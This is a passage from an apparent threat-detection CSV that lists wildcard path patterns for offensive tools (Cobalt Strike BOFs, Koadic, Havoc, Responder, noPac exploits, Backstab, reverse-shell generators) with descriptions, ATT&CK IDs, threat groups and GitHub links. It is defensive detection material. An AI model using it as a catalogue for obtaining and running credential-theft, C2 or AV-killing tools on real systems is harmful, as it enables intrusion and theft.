included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/regsvcs/meterpreter*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/regsvr.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/regsvr32/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/releases/download/*/abc.exe*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/remotereg.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/remotereg.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/remoteshell.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*/resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/resources/PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/resources/selfdestruction*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder/Responder.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/Responder/Responder.conf*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/returnvar/wce/*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*/rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*/reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"*/rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ricardojba/Invoke-noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" +"*/ricardojba/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ridenum/ridenum.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/Ridter/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*/rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security 